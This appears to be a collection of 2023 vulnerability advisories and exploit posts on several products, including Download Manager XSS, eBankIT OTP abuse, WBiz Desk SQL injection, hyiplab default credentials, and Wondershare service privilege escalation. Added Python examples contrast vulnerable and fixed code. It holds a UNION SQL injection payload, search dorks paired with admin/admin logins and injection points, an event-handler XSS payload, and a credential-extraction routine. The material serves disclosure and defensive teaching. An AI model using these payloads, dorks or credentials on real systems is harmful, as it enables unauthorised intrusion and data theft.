<pre><code>W3 Eden recently patched an Authenticated Stored Cross-Site Scripting vulnerability in Download Manager.<br /><br />On April 25, 2023, our Wordfence Threat Intelligence team identified and began the responsible disclosure process for a stored Cross-Site Scripting (XSS) vulnerability in W3 Eden’s Download Manager plugin, which is actively installed on more than 100,000 WordPress websites, making it one of the most popular download management plugins. The vulnerability enables threat actors with contributor-level permissions or higher to inject malicious web scripts into pages using the plugin’s shortcode.<br /><br />All Wordfence Premium, Wordfence Care, and Wordfence Response customers, as well as those still using the free version of our plugin, are protected against any exploits targeting this vulnerability by the Wordfence firewall’s built-in Cross-Site Scripting protection.<br /><br />We contacted W3 Eden on April 25, 2023, and promptly received a response. After providing full disclosure details, the developer released a patch on May 1, 2023. 
We would like to commend the W3 Eden development team for their prompt response and timely patch.<br /><br />We urge users to update their sites with the latest patched version of Download Manager, version 3.2.71 at the time of this writing, as soon as possible.<br /><br />READ THIS POST ON THE BLOG<br /><br />Vulnerability Summary from Wordfence Intelligence<br /><br />Description: Download Manager <= 3.2.70 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode <br /><br />Affected Plugin: Download Manager<br /><br />Plugin Slug: download-manager<br /><br />Affected Versions: <= 3.2.70<br /><br />CVE ID: CVE-2023-2305<br /><br />CVSS Score: 6.4 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Lana Codes<br /><br />Fully Patched Version: 3.2.71<br /><br />The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wpdm_members’, ‘wpdm_login_form’, ‘wpdm_reg_form’ shortcodes in versions up to, and including, 3.2.70 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.<br /><br />Technical Analysis<br /><br />Download Manager is a plugin designed to allow WordPress users to manage, track and control file downloads. It provides a shortcode ([wpdm_members]) that lists the authors and the number of files they have added when added to a WordPress page. However, insecure implementation of the plugin’s shortcode functionality allows for the injection of arbitrary web scripts into these pages. Examining the code reveals that the members method in the User class did not adequately sanitize the user-supplied ‘sid’ input, and then loads the members.php view file, where it also did not adequately escape ‘sid’ output. 
This makes it possible to inject attribute-based Cross-Site Scripting payloads via the ‘sid’ attribute.<br /><br />[View the Code Snippets on the Blog] <br /><br />There are two other shortcodes, a login form shortcode ([wpdm_login_form]) and a registration form shortcode ([wpdm_reg_form]), that add forms to a WordPress site. However, the insecure implementation of these two shortcode functions, similar to the previous example, also allows arbitrary web scripts to be inserted into these pages. Examining the code reveals that the functions of both forms do not adequately sanitize the user-supplied ‘logo’ input, and in the view files these ‘logo’ outputs are not adequately escaped.<br /><br />[View the Code Snippets on the Blog] <br /><br />These make it possible for threat actors to carry out stored XSS attacks. Once a script is injected into a page or post, it will execute each time a user accesses the affected page. While this vulnerability does require that a trusted contributor account is compromised, or a user be able to register as a contributor, successful threat actors could steal sensitive information, manipulate site content, inject administrative users, edit files, or redirect users to malicious websites which are all severe consequences.<br /><br />Disclosure Timeline<br /><br />April 25, 2023 – Wordfence Threat Intelligence team discovers the stored XSS vulnerability in Download Manager and initiates responsible disclosure.<br /><br />April 27, 2023 – We get in touch with the development team at W3 Eden and send full disclosure details.<br /><br />May 1, 2023 – The fully patched version, 3.2.71, is released.<br /><br />May 3, 2023 – The vendor notified Wordfence that they released the patch.<br /><br />May 3, 2023 – Wordfence confirms the fix addresses the vulnerability.<br /><br />Conclusion<br /><br />In this blog post, we have detailed a stored XSS vulnerability within the Download Manager plugin affecting versions 3.2.70 and earlier. 
This vulnerability allows authenticated threat actors with contributor-level permissions or higher to inject malicious web scripts into pages that execute when a user accesses an affected page. The vulnerability has been fully addressed in version 3.2.71 of the plugin.<br /><br />We encourage WordPress users to verify that their sites are updated to the latest patched version of Download Manager.<br /><br />All Wordfence users, including those running Wordfence Premium, Wordfence Care, and Wordfence Response, as well as sites still running the free version of Wordfence, are fully protected against this vulnerability.<br /><br />If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.<br /><br />For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.<br /></code></pre>
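The attribute-context XSS described above (a contributor-supplied shortcode attribute dropped into the view's markup without escaping), shown as an added Python example rather than the plugin's own PHP. The shortcode syntax copies WordPress ([tag key="value"]), the three view templates are assumptions standing in for the plugin's members/login/registration views, and only the attribute names sid and logo come from the advisory. Escaping here plays the role WordPress's esc_attr() plays in the patch; for logo, which lands in a URL attribute, the example also shows why escaping alone is not enough (an esc_url()-style scheme check is needed as well).

```python
"""Attribute-context stored XSS through shortcode attributes, in Python.

Added example; this is not code from the Download Manager plugin. The
shortcode syntax copies WordPress ([tag key="value"]), the view templates
are assumptions standing in for the plugin's views, and only the attribute
names (sid, logo) come from the advisory.
"""
import html
import re
from collections import defaultdict
from html.parser import HTMLParser

_TAG_RE = re.compile(r"\[(\w+)((?:\s+[^\]]*)?)\]")
_ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)')""")

# Stand-ins for the view files; {sid}/{logo} mark where the attribute lands.
VIEWS = {
    "wpdm_members": '<div class="wpdm-members" id="{sid}"></div>',
    "wpdm_login_form": '<form class="wpdm-login"><img src="{logo}" alt=""></form>',
    "wpdm_reg_form": '<form class="wpdm-reg"><img src="{logo}" alt=""></form>',
}
URL_ATTRS = {"logo"}   # attributes that end up in src=/href=


def parse_shortcode(text):
    """Return (tag, attrs) for one shortcode. Values come back exactly as a
    contributor typed them into the post body; nothing is sanitized here."""
    m = _TAG_RE.match(text.strip())
    if not m:
        raise ValueError("not a shortcode: %r" % text)
    attrs = {}
    for name, dq, sq in _ATTR_RE.findall(m.group(2)):
        attrs[name] = dq if dq else sq
    return m.group(1), attrs


def _safe_url(value):
    """esc_url()-style guard: keep relative and http(s) URLs, drop the rest
    (javascript:, data:, ...), since escaping cannot neutralise a scheme."""
    scheme = value.split(":", 1)[0].lower() if ":" in value else ""
    return value if scheme in ("", "http", "https") else ""


def render(tag, attrs, escape):
    """Expand the view for `tag`. escape=False mirrors the unpatched code
    path (raw attribute concatenated into the markup); escape=True applies
    attribute-context escaping plus the URL check for URL attributes."""
    values = defaultdict(str)
    for k, v in attrs.items():
        if escape:
            if k in URL_ATTRS:
                v = _safe_url(v)
            v = html.escape(v, quote=True)
        values[k] = v
    return VIEWS[tag].format_map(values)


class _AttrCollector(HTMLParser):
    """Collects the attributes a browser would actually see on the tags."""
    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        self.attrs.update(attrs)


def browser_attributes(fragment):
    """Parse rendered markup and return {attribute: value}; an injected
    event handler shows up here as its own key, escaped text does not."""
    p = _AttrCollector()
    p.feed(fragment)
    return p.attrs


def injected_handlers(fragment):
    """Names of on* event-handler attributes present after parsing."""
    return sorted(k for k in browser_attributes(fragment) if k.startswith("on"))


if __name__ == "__main__":
    # Constructed payload: closes the id="..." attribute and adds a handler.
    post = "[wpdm_members sid='\" onmouseover=\"alert(document.domain)']"
    tag, attrs = parse_shortcode(post)
    print(injected_handlers(render(tag, attrs, escape=False)))  # ['onmouseover']
    print(injected_handlers(render(tag, attrs, escape=True)))   # []
```

The parser-based check is deliberate: a regex for `on\w+=` over the escaped output would still fire on the literal text `&quot; onmouseover=&quot;`, whereas parsing shows what a browser builds, and there the whole payload is just the value of id.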
<pre><code>CVE-2023-33291<br /><br />[Description]<br />In eBankIT 6, the public endpoints /public/token/Email/generate and<br />/public/token/SMS/generate allow generation of OTP messages to any email<br />address or phone number without validation.<br />------------------------------------------<br /><br />[Additional Information]<br />The cookies in the request are not needed; they can be empty.<br /><br />------------------------------------------<br /><br />[Vulnerability Type]<br />Insecure Permissions<br /><br />------------------------------------------<br /><br />[Vendor of Product]<br />eBankIT<br /><br />------------------------------------------<br /><br />[Affected Product Code Base]<br />eBankIT - Version 6<br /><br />------------------------------------------<br /><br />[Affected Component]<br />Public API Endpoint: /public/token/Email/generate<br />Public API Endpoint: /public/token/SMS/generate<br /><br />------------------------------------------<br /><br />[Attack Type]<br />Remote<br /><br />------------------------------------------<br /><br />[Impact Denial of Service]<br />true<br /><br />------------------------------------------<br />[CVE Impact Other]<br />Because these endpoints are public and the cookie values are not required,<br />a threat actor could leverage this functionality to have genuine OTP<br />messages delivered to recipients of their choosing, creating a more<br />realistic social engineering scenario that could affect clients.<br /><br />------------------------------------------<br />[Attack Vectors]<br />To exploit this vulnerability, an attacker intercepts a request to the<br />public API endpoint /public/token/Email/generate or<br />/public/token/SMS/generate and modifies the parameters to choose which<br />email address or phone number the OTP is sent to. The request is accepted<br />without any restriction.<br /><br />------------------------------------------<br /><br />[Discoverer]<br />Steeven Rodríguez<br /></code></pre>
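The bug class above, an OTP-delivery endpoint that takes its recipient from the caller and never checks the session, next to a hardened handler, as an added Python example. This is not eBankIT code: the request shape ({"channel", "cookies", "params"}), the session store, the in-memory outbox and the rate-limit figures are all assumptions; only the endpoint names and the observation that the recipient is attacker-controlled come from the advisory. The fix has two parts that match the two impacts listed (social engineering and denial of service): bind the recipient to the authenticated user's record on file, and rate-limit per session so the endpoint cannot be used to flood anyone's inbox or phone.

```python
"""OTP-generation endpoint: the pattern described for CVE-2023-33291 next to
a hardened version, in Python.

Added example, not eBankIT code. Request shape, session store and the
rate-limit figures are assumptions; only the endpoint names and the
caller-chosen recipient come from the advisory.
"""
import secrets
import time
from collections import defaultdict, deque

# Constructed session store: cookie value -> contact details on file.
SESSIONS = {"sess-1": {"email": "alice@example.com", "phone": "+15550100"}}

# Stand-in for the SMS / e-mail gateway; records what would have been sent.
OUTBOX = []


def _deliver(channel, recipient):
    otp = "%06d" % secrets.randbelow(10 ** 6)
    OUTBOX.append((channel, recipient, otp))
    return {"status": "sent", "channel": channel, "to": recipient}


def generate_vulnerable(request):
    """/public/token/<channel>/generate as the advisory describes it: no
    session check, and the recipient is whatever the caller put in the
    parameters, so anyone can direct OTP messages at any address/number."""
    channel = request["channel"]
    key = "email" if channel == "Email" else "phone"
    return _deliver(channel, request["params"][key])


class OtpService:
    """Hardened handler: recipient bound to the authenticated user, and a
    per-session sliding-window limit to blunt message-flood abuse."""

    def __init__(self, max_per_window=3, window_s=300, now=time.time):
        self.max_per_window = max_per_window
        self.window_s = window_s
        self.now = now                      # injectable clock for testing
        self._sent = defaultdict(deque)     # session token -> send timestamps

    def generate(self, request):
        token = request.get("cookies", {}).get("session")
        user = SESSIONS.get(token)
        if user is None:
            return {"status": "error", "reason": "authentication required"}
        channel = request["channel"]
        if channel not in ("Email", "SMS"):
            return {"status": "error", "reason": "unknown channel"}
        # Recipient comes from the server-side record; request params are ignored.
        recipient = user["email"] if channel == "Email" else user["phone"]
        if not self._allow(token):
            return {"status": "error", "reason": "rate limited"}
        return _deliver(channel, recipient)

    def _allow(self, token):
        """Sliding window: at most max_per_window sends per window_s seconds."""
        t = self.now()
        q = self._sent[token]
        while q and t - q[0] >= self.window_s:
            q.popleft()
        if len(q) >= self.max_per_window:
            return False
        q.append(t)
        return True


if __name__ == "__main__":
    forged = {"channel": "SMS", "cookies": {}, "params": {"phone": "+15550199"}}
    print(generate_vulnerable(forged)["to"])        # +15550199, attacker-chosen
    print(OtpService().generate(forged)["reason"])  # authentication required
```

Note that the hardened handler does not even read `params`: if the application genuinely needs to send an OTP to a not-yet-verified address (enrolment), that flow should be a separate, authenticated, rate-limited endpoint rather than a parameter on this one.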
<pre><code>[#] Exploit Title: WBiz Desk 1.2 - SQL Injection<br />[#] Exploit Date: May 12, 2023.<br />[#] CVSS 3.1: 6.4 (Medium)<br />[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N<br />[#] Tactic: Initial Access (TA0001)<br />[#] Technique: Exploit Public-Facing Application (T1190)<br />[#] Application Name: WBiz Desk<br />[#] Application Version: 1.2<br />[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system<br /><br /><br />[#] Author: h4ck3r - Faisal Albuloushi<br />[#] Contact: SQL@hotmail.co.uk<br />[#] Blog: https://www.0wl.tech<br /><br /><br />[#] 3xploit:<br /><br />[path]/ticket.php?tk=[SQL Injection]<br /><br /><br />[#] 3xample:<br /><br />[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -<br /><br /><br />[#] Notes:<br />- The vulnerability requires a non-admin privilege (normal) user to be exploited.<br /></code></pre>
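The UNION-based injection above, reproduced as an added Python example against SQLite so it runs offline; it is not WBiz Desk code. The schema and rows are constructed, the vulnerable query has 5 columns rather than the 16 the original payload implies, and MySQL's CONCAT()/0x... hex strings are written as SQLite's || and plain string literals. The two steps are the ones the page's payload encodes: the run of NULLs is the column-count search (a UNION only compiles when both SELECTs have the same width), and the CONCAT with fixed markers lets the stolen value be picked out of whatever the page renders. The parameterised version beside it is the fix.

```python
"""UNION-based SQL injection of the kind shown for ticket.php?tk=, against
SQLite. Added example; not WBiz Desk code. Schema and rows are constructed,
column count and string syntax differ from the MySQL payload on the page.
"""
import re
import sqlite3

MARK_L, MARK_R = "qkjkq", "qbkkq"   # like sqlmap's 0x716b6a6b71 / 0x71626b6b71


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE tickets(id INTEGER, subject TEXT, body TEXT, owner TEXT, status TEXT);
        INSERT INTO tickets VALUES (83, 'Printer down', 'Paper jam on floor 2', 'bob', 'open');
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '$2y$10$constructedhash');
    """)
    return db


def ticket_vulnerable(db, tk):
    """ticket.php?tk=<tk> with the value concatenated straight into the SQL."""
    sql = "SELECT id, subject, body, owner, status FROM tickets WHERE id = '%s'" % tk
    return db.execute(sql).fetchall()


def ticket_fixed(db, tk):
    """Same lookup with a bound parameter; the value can never change the query shape."""
    sql = "SELECT id, subject, body, owner, status FROM tickets WHERE id = ?"
    return db.execute(sql, (tk,)).fetchall()


def find_column_count(fetch, max_cols=32):
    """Step 1 of the attack: grow the NULL list until the UNION stops
    erroring; that width is the number of columns in the original SELECT.
    Only meaningful against the vulnerable path (the fixed one never errors)."""
    for n in range(1, max_cols + 1):
        try:
            fetch("83' UNION ALL SELECT " + ",".join(["NULL"] * n) + "-- -")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def extract(fetch, expr, position, ncols):
    """Step 2: put MARK_L||(expr)||MARK_R in one column of the UNION row and
    pull the value back out of whatever the page returns."""
    cols = ["NULL"] * ncols
    cols[position] = "'%s'||(%s)||'%s'" % (MARK_L, expr, MARK_R)
    rows = fetch("83' UNION ALL SELECT " + ",".join(cols) + "-- -")
    pat = re.compile(re.escape(MARK_L) + "(.*?)" + re.escape(MARK_R))
    for row in rows:
        for cell in row:
            if isinstance(cell, str):
                m = pat.search(cell)
                if m:
                    return m.group(1)
    return None


if __name__ == "__main__":
    db = make_db()
    vuln = lambda tk: ticket_vulnerable(db, tk)
    n = find_column_count(vuln)
    print(n, extract(vuln, "SELECT username||':'||password FROM users", 1, n))
    print(ticket_fixed(db, "83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- -"))  # []
```

The `-- -` tail is what swallows the closing quote the application appends; with the bound parameter the whole string is compared against the id column as data, matches nothing, and no error or extra row comes back, which is also why error-based column counting tells you nothing about a parameterised query.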
<pre><code>====================================================================================================================================<br />| # Title : hyiplab V2.1 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit) | <br />| # Vendor : https://appdevs.net/ | <br />| # Dork : "Every balance subtracting transactions need OTP verification so You can feel safe about your funds." |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is the default settings left in place after installing the script:<br /> the default username and password are still in use.<br /> <br />[+] Dorking in Google or another search engine.<br /><br />[+] Use Payload : user=admin & pass= admin<br /><br />[+] https://127.0.0.1/hyiplab/admin/dashboard<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>===========================================================================================<br />| # Title : Esg 2.5 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://www.creatop.com.tw/esg | <br />| # Dork : Powered by CREATOP |<br />===========================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use Payload : news.php?tayear=2023<br /><br />[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?tayear=2023 <==== inject here<br /><br />[+] Panel : /admin/login.php<br /><br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Code Bakers v1.0 SQL injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://www.codebakers.co.uk/ | <br />| # Dork : "dishes.php?res_id=" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use payload : /dishes.php?res_id= <===== inject here <br /><br />[+] https://127.0.0.1/talwarabazaar.com/dishes.php?res_id=5<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)<br /># Date: 2023-02-02<br /># Exploit Author: Andrea Intilangelo<br /># Vendor Homepage: https://civicrm.org<br /># Software Link: https://civicrm.org/download<br /># Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier)<br /># Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70)<br /># CVE: CVE-2023-25440 / Vendor Security Advisory: CIVI-SA-2023-05<br /><br /><br />Description:<br /><br />A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows an attacker to execute arbitrary web<br />scripts or HTML.<br /><br />Persistent JavaScript injected through the "Add Contact" (Quick Add) function, in the first or last name field of<br />the new contact, is triggered whenever a page that renders the contact name is loaded.<br /><br /><br />Steps to reproduce:<br /><br />- Use Quick Add to add a contact to CiviCRM,<br />- Insert a PoC payload in the name field(s),<br />- Click on 'Add contact'.<br /><br />When a user visits the dashboard, the "Recently added" box renders the JavaScript.<br /><br /><br />Timeline:<br /><br />2023-01-29: Vulnerability discovered<br />2023-02-02: Request for CVE reservation<br />2023-02-04: Vendor contacted<br />2023-02-06: Vendor replies, acknowledgments and coordinating for advisory<br />2023-02-14: Vendor discloses Security advisory and credits, internal id: CIVI-SA-2023-05<br />2023-02-15: Vendor Security Advisory publication on https://civicrm.org/advisory/civi-sa-2023-05-quick-add-widget<br />2023-04-27: Assigned CVE number: CVE-2023-25440<br />2023-05-18: CVE publication / disclosure<br /></code></pre>
<pre><code># Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)<br /># Date: 2023-04-17<br /># Exploit Author: Rahad Chowdhury<br /># Vendor Homepage: http://churchcrm.io/<br /># Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4<br /># Version: 4.5.4<br /># Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53<br /># CVE: CVE-2023-31699<br /><br />Steps to Reproduce:<br /><br />1. First, log in to the admin panel.<br />2. Open the "Admin" menu and click "CSV Import"; the CSV file<br />upload option appears.<br />3. Insert an XSS payload into the metadata of a JPG file using exiftool (or via the image<br />properties dialog), then upload the JPG file.<br />4. The XSS pop-up appears.<br /></code></pre>
<pre><code>Vendor Name: MobileTrans<br />Product Name: MobileTrans<br />Vendor Home Page: https://mobiletrans.wondershare.com/<br />Affected Version(s): MobileTrans version 4.0.11<br />Vulnerability Type: Weak Service Permissions (CWE-276)<br />CVE Reference: CVE-2023-31748<br />Security Researcher: Thurein Soe<br /><br />Vulnerability description:<br />MobileTrans is a mobile-to-mobile file transfer application. MobileTrans version 4.0.11<br />suffers from a weak service permission vulnerability that allows a normal Windows user to<br />elevate to local administrator. Installing MobileTrans 4.0.11 on Windows registers a service<br />named "ElevationService" that runs as LocalSystem, and its binary grants Full control to<br />Everyone (see the cacls output below), so any local user can replace the executable and have<br />it run with SYSTEM privileges. Effectively, the local user is able to elevate to local admin.<br /><br />C:\Users\HninKayThayar\Desktop>sc qc ElevationService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ElevationService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Wondershare Driver Install Service help<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\Users\HninKayThayar\Desktop>cacls "C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe"<br />C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Everyone:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Administrators:(ID)F<br /> BUILTIN\Users:(ID)R<br /> APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R<br /> APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R<br /></code></pre>
<pre><code>Vendor Name: Filmora<br />Product Name: Filmora 12 (bundling Wondershare NativePush Build 1.0.0.7)<br />Vendor Home Page: https://filmora.wondershare.com/<br />Affected Version(s): Filmora 12 version (Build 12.2.1.2088)<br />Vulnerability Type: Unquoted Service Path Vulnerability (CWE-428)<br />CVE Reference: CVE-2023-31747<br />Security Researcher: Thurein Soe<br /><br /><br /><br />Vulnerability description:<br />Filmora is professional video editing software. Wondershare NativePush Build 1.0.0.7 is part of<br />Filmora 12 (Build 12.2.1.2088) and is installed alongside it. Its service, "NativePushService",<br />has an unquoted service path and runs with SYSTEM privileges, which leads to full local privilege<br />escalation on the affected system. Effectively, the local user is able to elevate to local admin.<br />Note that the cacls output below also shows BUILTIN\Users with Full control on the service binary,<br />which lives under the user's own profile directory, so the executable can be replaced directly as<br />well as hijacked through the unquoted path.<br /><br />C:\>sc qc NativePushService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: NativePushService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Wondershare Native Push Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\>cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe"<br />C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe BUILTIN\Users:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Administrators:(ID)F<br /> HNINKAYTHAYAR\HninKayThayar:(ID)F<br /></code></pre>
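The two Wondershare findings above (a service binary writable by Everyone, and a LocalSystem service with an unquoted path under the user's profile) reduce to the same audit: read what `sc qc` and `cacls` report and check who can write the binary, who the service runs as, and which alternative executables an unquoted path would make Windows try first. The following is an added Python example of that audit, not the researcher's tooling. It parses captured command output (the two advisories' output, re-joined onto single lines where mail wrapping broke the paths) rather than querying the Service Control Manager, so it runs anywhere; the unquoted-path candidates it lists are reported for manual checking, because they are only exploitable if a low-privileged user can actually create the candidate file, which this offline check cannot verify.

```python
"""Static audit of `sc qc` / `cacls` output for weak service-binary ACLs and
unquoted service paths. Added example, not the researcher's tooling; it
reads captured output rather than querying the Service Control Manager."""
import re

# Principals a standard user controls; a write-capable ACE for any of these
# on a service binary run as LocalSystem is a privilege-escalation path.
LOW_PRIV_PRINCIPALS = {"everyone", r"builtin\users",
                       r"nt authority\authenticated users", r"nt authority\interactive"}
WRITE_RIGHTS = {"F", "C", "W"}   # cacls: Full, Change, Write


def parse_sc_qc(text):
    """Return the FIELD : value pairs printed by `sc qc <service>`."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def unquoted_path_candidates(binary_path):
    """For an unquoted path containing spaces, list the executables Windows
    would try before the real one (each prefix ending at a space + .exe)."""
    p = binary_path.strip()
    if p.startswith('"'):
        return []
    m = re.match(r"(.+?\.exe)", p, re.I)
    exe = m.group(1) if m else p
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def parse_cacls(text, path):
    """Return [(principal, rights)] from `cacls <path>`; cacls echoes the
    path in front of the first ACE, so strip it before matching ACEs."""
    body = re.sub(re.escape(path), "", text, flags=re.I)
    aces = []
    for line in body.splitlines():
        m = re.match(r"\s*(.+?):((?:\([A-Z]+\))*)([A-Z]+)\s*$", line)
        if m:
            aces.append((m.group(1).strip(), m.group(3)))
    return aces


def audit_service(sc_text, cacls_text):
    f = parse_sc_qc(sc_text)
    path = f.get("BINARY_PATH_NAME", "")
    m = re.match(r'"?(.+?\.exe)', path, re.I)
    exe = m.group(1) if m else path.strip('"')
    findings = []
    if f.get("SERVICE_START_NAME", "").lower() == "localsystem":
        findings.append("runs as LocalSystem")
    if re.search(r"\\Users\\", exe, re.I):
        findings.append("binary lives under a user profile")
    candidates = unquoted_path_candidates(path)
    if candidates:
        findings.append("unquoted path with spaces")   # verify dir ACLs by hand
    weak = [(p, r) for p, r in parse_cacls(cacls_text, exe)
            if p.lower() in LOW_PRIV_PRINCIPALS and r in WRITE_RIGHTS]
    if weak:
        findings.append("binary writable by low-privileged principals")
    return {"service": f.get("SERVICE_NAME"), "binary": exe,
            "hijack_candidates": candidates, "weak_aces": weak, "findings": findings}


# Output reproduced (abridged, paths re-joined) from the two advisories above.
SC_QC_ELEVATION = r"""SERVICE_NAME: ElevationService
        TYPE               : 10  WIN32_OWN_PROCESS
        BINARY_PATH_NAME   : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
        SERVICE_START_NAME : LocalSystem
"""
CACLS_ELEVATION = r"""C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Everyone:(ID)F
        NT AUTHORITY\SYSTEM:(ID)F
        BUILTIN\Administrators:(ID)F
        BUILTIN\Users:(ID)R
"""
SC_QC_NATIVEPUSH = r"""SERVICE_NAME: NativePushService
        BINARY_PATH_NAME   : C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe
        SERVICE_START_NAME : LocalSystem
"""
CACLS_NATIVEPUSH = r"""C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe BUILTIN\Users:(ID)F
        NT AUTHORITY\SYSTEM:(ID)F
        BUILTIN\Administrators:(ID)F
        HNINKAYTHAYAR\HninKayThayar:(ID)F
"""

if __name__ == "__main__":
    for sc, acl in ((SC_QC_ELEVATION, CACLS_ELEVATION), (SC_QC_NATIVEPUSH, CACLS_NATIVEPUSH)):
        print(audit_service(sc, acl))
```

For the MobileTrans service the decisive finding is the Everyone:F ACE on the binary; the two unquoted-path candidates it also reports (C:\Program.exe, C:\Program Files.exe) sit in directories standard users cannot write to on a default install, which is exactly why the candidate list is advisory rather than a verdict. For NativePush both findings are real: the path is unquoted and the binary sits in, and is writable from, the user's own AppData.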